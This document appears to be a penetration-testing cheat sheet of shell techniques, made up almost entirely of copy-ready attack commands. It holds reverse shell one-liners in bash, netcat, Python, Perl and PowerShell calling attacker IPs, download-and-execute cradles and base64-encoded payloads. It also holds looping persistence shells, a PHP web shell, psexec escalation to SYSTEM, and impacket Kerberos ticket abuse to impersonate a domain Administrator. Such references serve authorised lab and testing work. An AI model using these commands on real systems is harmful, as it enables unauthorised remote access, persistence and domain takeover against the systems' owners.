Reverse Shell
Linux
Copy #Bash
bash -c 'bash -i >& /dev/tcp/<ip>/443 0>&1'
#netcat
nc < i p > < por t > -e /bin/bash
nc < i p > < por t > -e cmd.exe
rm /tmp/f ; mkfifo /tmp/f ; cat /tmp/f | /bin/sh -i 2>&1| nc < i p > 443 > /tmp/f
#php
#(with proc_open & proc_close - shell.phar)
<? php
$descriptorspec = array(
0 = > array ( "pipe" , "r" ) ,
1 = > array ( "pipe" , "w" ) ,
2 = > array ( "file" , "/tmp/error-output.txt" , "a" )
);
$cwd = "/tmp" ;
$env = array ( "some_option" = > "aeiou" );
$process = proc_open ( "sh" , $descriptorspec , $pipes , $cwd , $env);
if ( is_resource($process )) {
fwrite($pipes[0], "nc 127.0.0.1 9001" );
fclose($pipes[0] );
echo stream_get_contents ($pipes[1]);
fclose($pipes[1] );
$return_value = proc_close ($process);
echo "command returned $return_value\n" ;
}
?>
#python injection input
__import__( 'os' ).system( 'whoami' )
#python.py
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.27",2323));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")
#perl
perl -e 'use Socket;$i="10.10.14.27";$p=2323;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("sh -i");};'
Windows
Copy #Execute file.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File shell.ps1
#Execute file remotely
IEX (New-Object System.Net.WebClient).DownloaString('http://<attacker ip>/shell.ps1')
# Invoke-PowershellTcpOneLine.ps1
# Invoke-PowerShellTcp.ps1
# 1. setup python http server
# 2. execute
powershell.exe IEX(New-Object Net.WebClient).downloadString('http://<ip attacker>/Invoke-PowerShellTcp.ps1")
#or
powershell iwr http://<ip attacker>/shell.ps1 -o C:/Windows/Tasks/shell.ps1
# encode payload
Cat Invoke-PowerShellTcpOneLine.ps1 | iconv -t utf-16le |base64 -w 0
powershell -enc <encode payload>
# Execute command without crashing the previous shell
# 1. pwn.ps1
Invoke-WebRequest -Uri http://<attacker ip> -OutFile C:\Windows\Tasks\shell.exe;
Start-Process -NoNewWindow -FilePath C:\Windows\Tasks\shell.exe
# 2. execute this command
powershell -ep bypass -c "iex(iwr -uri <attacker ip>/pwn.ps1 -usebasicparsing)"
# note: you could change the payload in the pwn.ps1 if your payload doesn't work.
Shell Stabilization (Linux)
When?
Note:
[ctrl + c] only work if machine has bash as the default shell
use "clear" instead.
Copy python -c 'import pty; pty.spawn("/bin/bash")'
export PATH = /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp
export TERM = xterm-256color
alias ll = 'clear ; ls -lsaht --color=auto'
Keyboart Shortcut: [Ctrl + Z] (Backgroud Process.)
Copy stty raw -echo ; fg ; reset
stty columns 200 rows 200
Persistence Reverse Shell
Important to run persistence shell before execute anything.
Linux
Copy while : ; do setsid bash -i & > /dev/tcp/ < ATTACKER IP > / < LPORT > 0>&1 ; sleep 60 ; done & > /dev/null &
nohup bash -c "while :; do bash -i >& /dev/tcp/<ATTACKER IP>/<LPORT> 0>&1; sleep 60; done" &
Windows
need to upload nc.exe
Copy start cmd /C "for /L %n in (1,0,10) do ( nc.exe <ATTACKER IP> <PORT> -e cmd.exe & ping -n 60 127.0.0.1 )"
Web Shell
PHP
cmd --> shell.php
Copy <?php
echo system($_REQUEST['cmd']);
?>
$URL/shell.php?cmd=id
note: the simple way is using burp suite repeater to do a command.
change GET request to POST request to get a better input experience.
IIS
Dig deeper
https://github.com/tennc/webshell
Windows NT Authority shell from Administrator
Copy psexec.exe -i -s cmd.exe
psexec.exe -i -s %SystemRoot%\system32\cmd.exe
Shell to another user in Active Directory
note: powershell
Convert credentials
Copy $pw = ConvertTo-SecureString "<password>" - AsPlainText - Force
$creds = New-Object System.Mangement.Automation.PSCredential "<username>" , $pw
Command
Copy Invoke-Command - ComputerName 127.0 . 0.1 - cred $creds - SCriptBlock { whoami }
after login, run powerview.
Shell with silver ticket
If the domain user has constrained delegation privileges
you can use the -impersonate flag to request a ticket on behalf of another user
for example:
Copy # example env
Target IP: 10.10.10.1
Domain: test.local
Service: www
Host Name: server01.test.local
Username: john
Password: password123
Impersonated User: Administrator
Request ticket
Copy # username and password
python getST.py -spn www/server01.test.local -dc-ip 10.10.10.1 -impersonate Administrator test.local/john:password123
impacket-getST -spn www/server01.test.local -dc-ip 10.10.10.1 -impersonate Administrator test.local/john:password123
# NTLM Hash
python3 getST.py -spn www/dc.intelligence.htb -impersonate Administrator intelligence.htb/svc_int$ -hashes <ntlm hash>:<ntlm hash>
Save ticket to env
Copy export KRB5CCNAME=Administrator.ccache
Login with ticket
Copy impacket-psexec -k -no-pass <domain>/Administrator@<domain controller>
impacket-psexec -k -no-pass intelligence.htb/Administrator@dc.intelligence.htb
Login using Impacket (need local admin creds)
need creds login, try the next command below if you failed on the one command.
Copy # test with crackmapexec smb
impacket-psexec <domain>/<username>@$IP
impacket-smbexec <domain>/<username>@$IP
# wmi port
impacket-wmiexec <domain>/<username>@$IP
# test with crackmapexec winrm
evil-winrm